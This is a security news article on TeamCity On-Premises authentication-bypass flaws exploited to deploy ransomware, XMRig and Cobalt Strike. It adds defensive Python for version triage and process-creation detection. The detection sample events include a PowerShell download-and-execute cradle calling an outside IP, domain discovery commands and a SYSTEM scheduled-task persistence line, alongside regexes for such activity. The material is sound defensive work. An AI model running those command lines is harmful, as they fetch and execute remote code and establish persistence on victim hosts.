Critical TeamCity flaws exploited to drop ransomware, cryptominers and backdoors

Multiple threat actors are exploiting two recently patched vulnerabilities affecting JetBrains’ TeamCity On-Premises continuous integration and continuous delivery (CI/CD) server to deliver ransomware, cryptocurrency miners, and other malware.

Tracked as CVE-2024-27198 and CVE-2024-27199, the flaws are described as improper authentication issues that could lead to a full system takeover. CVE-2024-27198 is an authentication bypass that gives an unauthenticated attacker with HTTP(S) access to a TeamCity server administrative control of that server; CVE-2024-27199 is a path traversal issue that allows a more limited bypass of authentication checks. Both flaws impact all TeamCity On-Premises versions through 2023.11.3 and have been fixed in version 2023.11.4. Because exploitation needs nothing more than HTTP(S) access to the server, an instance that cannot be updated immediately should not be reachable from untrusted networks.
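The first question for anyone running TeamCity On-Premises is which servers are still on an affected release. The following is an added example, not code from the article or from JetBrains: it parses TeamCity version strings of the forms an inventory typically holds and flags everything below the fixed version named above. The inventory and hostnames are constructed for illustration.

```python
import re

# Fix version per the advisory: every On-Premises release up to and
# including 2023.11.3 is affected, 2023.11.4 is the first fixed release.
FIXED_VERSION = (2023, 11, 4)

# Accepts "2023.11.3", "2023.11", "2023.11.4 (build 147512)" and the older
# two-component scheme such as "10.0.5"; anything after the numbers is ignored.
_VERSION_RE = re.compile(r"^\s*(\d+)\.(\d+)(?:\.(\d+))?")


def parse_version(text):
    """Return a comparable (major, minor, patch) tuple for a TeamCity version
    string. A missing patch component means the .0 release of that line."""
    match = _VERSION_RE.match(text)
    if not match:
        raise ValueError(f"unrecognised TeamCity version string: {text!r}")
    major, minor, patch = match.groups()
    return (int(major), int(minor), int(patch or 0))


def is_vulnerable(text):
    """True when the version predates the 2023.11.4 fix."""
    return parse_version(text) < FIXED_VERSION


def triage(inventory):
    """inventory maps hostname -> version string (for example collected from
    the TeamCity footer or your CMDB). Returns the hosts that need the update,
    sorted so the output is stable."""
    return sorted(host for host, version in inventory.items() if is_vulnerable(version))


# Constructed sample inventory; the hostnames and versions are made up.
INVENTORY = {
    "ci-prod-01": "2023.11.3 (build 147512)",
    "ci-prod-02": "2023.11.4 (build 147512)",
    "ci-legacy": "2022.10",
    "ci-staging": "2024.03",
    "ci-old": "10.0.5",
}

if __name__ == "__main__":
    for host in triage(INVENTORY):
        print(f"{host}: {INVENTORY[host]} -> update to 2023.11.4 or later")
```

Versions that fail to parse raise instead of silently counting as safe; treat an unparsable entry in a real inventory as "unknown, go and look", never as patched.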

“Public proof-of-concept (PoC) exploits for these vulnerabilities already exist, heightening the risk of widespread exploitation,” cybersecurity firm Trend Micro notes in its recent report.

Threat actors may exploit CVE-2024-27198 or CVE-2024-27199 to bypass authentication on vulnerable TeamCity On-Premises servers and execute commands. This can lead to Remote Code Execution (RCE) in the context of the TeamCity server process, for example by launching command and scripting interpreters such as PowerShell to download further malware or run reconnaissance commands.

Subsequently, attackers can install malware that establishes communication with a command-and-control (C&C) server, from which they can issue additional commands such as deploying Cobalt Strike beacons and Remote Access Trojans (RATs). Finally, ransomware may be deployed as the ultimate payload, encrypting files and extorting ransom payments from victims.

The researchers said they observed multiple attacks exploiting these flaws. In one case, attackers abused the flaws to drop the Jasmin ransomware. In other instances, the threat actors were observed deploying a variant of the XMRig cryptocurrency miner, Cobalt Strike beacons and the SparkRAT malware, and executing domain discovery and persistence commands.
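The chain described above (authentication bypass, then the server process launching a script interpreter, then download cradles, domain discovery and persistence) leaves a distinctive trace in process-creation telemetry: the TeamCity server's Java process becoming the parent of PowerShell, cmd.exe or similar. The following is an added detection example written for this article, not code from Trend Micro or JetBrains. It assumes Sysmon Event ID 1 style field names (Image, CommandLine, ParentImage, ParentCommandLine), assumes the server runs from a path or command line containing "TeamCity", and deliberately skips parents that look like a TeamCity build agent, because agents legitimately spawn interpreters for build steps. The sample events are constructed.

```python
import ntpath
import re

# Children the TeamCity *server* process has no routine reason to spawn.
# (Build agents do; they are excluded below.) Assumed lists, tune to your fleet.
INTERPRETERS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "certutil.exe", "bitsadmin.exe", "curl.exe", "rundll32.exe",
    "regsvr32.exe",
}
DISCOVERY_IMAGES = {"whoami.exe", "nltest.exe", "net.exe", "net1.exe",
                    "systeminfo.exe", "ipconfig.exe", "tasklist.exe"}

DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-expression"
    r"|\biex\b|frombase64string|(^|\s)-e(nc(odedcommand)?)?\b|https?://", re.I)
DOMAIN_DISCOVERY_RE = re.compile(
    r"\bnltest\b|domain admins|/domain\b|get-addomain|get-aduser|dsquery", re.I)
PERSISTENCE_RE = re.compile(
    r"schtasks(\.exe)?\s+/create|\\currentversion\\run|\bsc(\.exe)?\s+create\b"
    r"|new-service|new-scheduledtask|register-scheduledtask", re.I)


def basename(path):
    """Lower-cased file name of a Windows path; works on any host OS."""
    return ntpath.basename(path or "").lower()


def is_teamcity_server(image, cmdline):
    """Heuristic (assumed layout): the server is java/javaw launched with
    'TeamCity' in its command line, and is not a build agent."""
    cmd = (cmdline or "").lower()
    if basename(image) not in {"java.exe", "javaw.exe"} or "teamcity" not in cmd:
        return False
    return not any(marker in cmd for marker in ("buildagent", "agentmain", "agent.home.dir"))


def classify(event):
    """Return the rule names a single process-creation event matches."""
    if not is_teamcity_server(event.get("ParentImage"), event.get("ParentCommandLine")):
        return []
    child = basename(event.get("Image"))
    cmd = event.get("CommandLine") or ""
    hits = []
    if child in INTERPRETERS:
        hits.append("teamcity_spawns_interpreter")
    if child in DISCOVERY_IMAGES or DOMAIN_DISCOVERY_RE.search(cmd):
        hits.append("teamcity_discovery")
    if DOWNLOAD_RE.search(cmd):
        hits.append("teamcity_download_cradle")
    if PERSISTENCE_RE.search(cmd):
        hits.append("teamcity_persistence")
    return hits


def analyze(events):
    """Run every event through classify() and keep those with findings."""
    findings = []
    for event in events:
        hits = classify(event)
        if hits:
            findings.append({"image": basename(event.get("Image")),
                             "cmdline": event.get("CommandLine", ""),
                             "rules": hits})
    return findings


# Constructed sample telemetry. 198.51.100.7 is a documentation (TEST-NET-2) address.
SERVER_IMAGE = r"C:\TeamCity\jre\bin\java.exe"
SERVER_CMD = r'"C:\TeamCity\jre\bin\java.exe" -classpath C:\TeamCity\bin\bootstrap.jar org.apache.catalina.startup.Bootstrap start'
AGENT_IMAGE = r"C:\BuildAgent\jre\bin\java.exe"
AGENT_CMD = r'"C:\BuildAgent\jre\bin\java.exe" -Dteamcity.agent.home=C:\BuildAgent jetbrains.buildServer.agent.AgentMain'

SAMPLE_EVENTS = [
    {"ParentImage": SERVER_IMAGE, "ParentCommandLine": SERVER_CMD,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')\""},
    {"ParentImage": SERVER_IMAGE, "ParentCommandLine": SERVER_CMD,
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami && nltest /dclist:corp"},
    {"ParentImage": SERVER_IMAGE, "ParentCommandLine": SERVER_CMD,
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r"schtasks /create /tn Updater /tr C:\Windows\Temp\svc.exe /sc onlogon /ru SYSTEM"},
    # Legitimate: the server polling a VCS root.
    {"ParentImage": SERVER_IMAGE, "ParentCommandLine": SERVER_CMD,
     "Image": r"C:\Program Files\Git\bin\git.exe",
     "CommandLine": "git.exe fetch --prune origin"},
    # Legitimate: a build agent running a PowerShell build step.
    {"ParentImage": AGENT_IMAGE, "ParentCommandLine": AGENT_CMD,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\BuildAgent\work\1a2b\build.ps1"},
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding["rules"], finding["cmdline"])
```

The agent exclusion is the important tuning knob: on hosts where an agent runs alongside the server, or where the server's own Java path does not contain "TeamCity", adjust is_teamcity_server() to match your actual install paths rather than loosening the child-process rules.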
